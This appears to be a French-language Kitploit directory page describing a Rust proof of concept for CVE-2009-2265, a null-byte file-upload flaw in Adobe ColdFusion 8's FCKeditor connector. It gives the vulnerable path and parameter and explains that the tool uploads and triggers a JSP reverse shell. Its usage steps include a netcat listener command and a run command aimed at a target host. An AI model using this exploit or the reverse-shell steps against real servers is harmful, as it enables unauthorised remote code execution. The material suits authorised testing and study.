Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2009-2265 — Une implémentation Rust du POC pour l'exploit CVE-2009-2265, ciblant Adobe ColdFusion 8. | Kitploit
Outils/GitHubGitHub/nika0x38/cve-2009-2265
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubnika0x38/cve-2009-2265

CVE-2009-2265

Une implémentation Rust du POC pour l'exploit CVE-2009-2265, ciblant Adobe ColdFusion 8.

Voir le dépôt
1il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2009-2265 - Adobe ColdFusion 8 RCE par téléchargement de fichier

RustSecurity

Une implémentation en Rust du POC pour l'exploit CVE-2009-2265, ciblant Adobe ColdFusion 8.


Présentation de la vulnérabilité

Cette vulnérabilité permet à un attaquant non authentifié de télécharger des fichiers arbitraires dans un répertoire accessible via le web sur un serveur exécutant Adobe ColdFusion 8, conduisant à une exécution de code à distance (RCE).

Détails techniques

  • Vulnérabilité : Contournement de répertoire par injection d'octet nul
  • Composant : Connecteur FCKeditor upload.cfm
  • Paramètre : CurrentFolder
  • Impact : Exécution de code à distance (RCE)
  • Logiciel affecté : Adobe ColdFusion 8.0.1 et versions antérieures

  • Description

    La vulnérabilité réside dans la fonctionnalité de téléchargement de fichiers du composant FCKeditor situé à l'adresse /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm. Le paramètre HTTP GET CurrentFolder n'est pas correctement assaini, ce qui permet une attaque par injection d'octet nul (%00).

    En forgeant une requête où le paramètre CurrentFolder est défini sur /<filename>.jsp%00, un attaquant peut contourner les vérifications d'extension côté serveur. Le système sous-jacent (souvent Java) interprète l'octet nul comme la fin de la chaîne, traitant le nom de fichier comme <filename>.jsp. Cela permet à l'attaquant de télécharger un fichier JSP malveillant. Le serveur enregistre ce fichier dans un répertoire accessible publiquement (/userfiles/file/), d'où il peut être exécuté simplement en accédant à son URL.

    Ce POC automatise le processus en générant une charge utile de reverse shell JSP, en la téléchargeant en utilisant la vulnérabilité d'octet nul, et en la déclenchant pour obtenir un shell sur le système cible.

    Utilisation

    Suivez ces étapes pour compiler et exécuter l'exploit.

    Étape 1 : Configurer un écouteur Netcat

    Avant d'exécuter l'exploit, démarrez un écouteur sur votre machine locale pour capturer le reverse shell entrant.

    root@kitploit:~
    
    nc -lnvp <attacker-port>
    
    

    Étape 2 : Exécuter l'exploit

    Exécutez le binaire compilé, en fournissant votre hôte/port local pour le reverse shell ainsi que l'hôte/port de la cible distante.

    root@kitploit:~
    
    cargo run -- --lhost <LHOST> --lport <LPORT> --rhost <RHOST> --rport <RPORT>
    
    

    Après que le script a déclenché la charge utile, vous devriez recevoir une connexion sur votre écouteur Netcat.

    Avertissement

    Cet outil est destiné à des fins éducatives et de tests de pénétration autorisés uniquement. Utilisez-le de manière responsable et uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite.

    Télécharger l’outil